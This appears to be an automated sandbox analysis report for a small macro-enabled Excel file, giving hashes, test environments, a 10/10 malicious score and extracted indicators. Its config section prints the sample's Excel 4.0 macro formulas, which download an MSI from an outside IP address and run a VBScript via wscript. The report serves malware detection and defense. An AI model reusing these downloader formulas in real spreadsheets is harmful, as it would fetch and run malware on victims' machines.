General
-
Target
c368ae91e64a96b8189e0798e5bb9739
-
Size
6KB
-
Sample
231222-rtnepaaffp
-
MD5
c368ae91e64a96b8189e0798e5bb9739
-
SHA1
23b36a29bcd4fe9ab5d7bd3ffba064e46a50a9b5
-
SHA256
1a4c1be4ec757f5ce46fc34551fda46e64291eacae408b8279ed05b6ca9d77a9
-
SHA512
c588b94cf1543b26b68b366a2c472b37003e8b926e9f52a25127b6d486e4be5032a2f19c4e8368bcca92daa22f09ae133749deac5ef605aa64862339273f5b34
-
SSDEEP
192:NDSAuSibrA2OmmfRN8UhHFBFYuLb98ygI8+I:NruTM2wn1FYmb98yXO
Static task
static1
Behavioral task
behavioral1
Sample
c368ae91e64a96b8189e0798e5bb9739.xlsm
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
c368ae91e64a96b8189e0798e5bb9739.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
c368ae91e64a96b8189e0798e5bb9739
-
Size
6KB
-
MD5
c368ae91e64a96b8189e0798e5bb9739
-
SHA1
23b36a29bcd4fe9ab5d7bd3ffba064e46a50a9b5
-
SHA256
1a4c1be4ec757f5ce46fc34551fda46e64291eacae408b8279ed05b6ca9d77a9
-
SHA512
c588b94cf1543b26b68b366a2c472b37003e8b926e9f52a25127b6d486e4be5032a2f19c4e8368bcca92daa22f09ae133749deac5ef605aa64862339273f5b34
-
SSDEEP
192:NDSAuSibrA2OmmfRN8UhHFBFYuLb98ygI8+I:NruTM2wn1FYmb98yXO
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-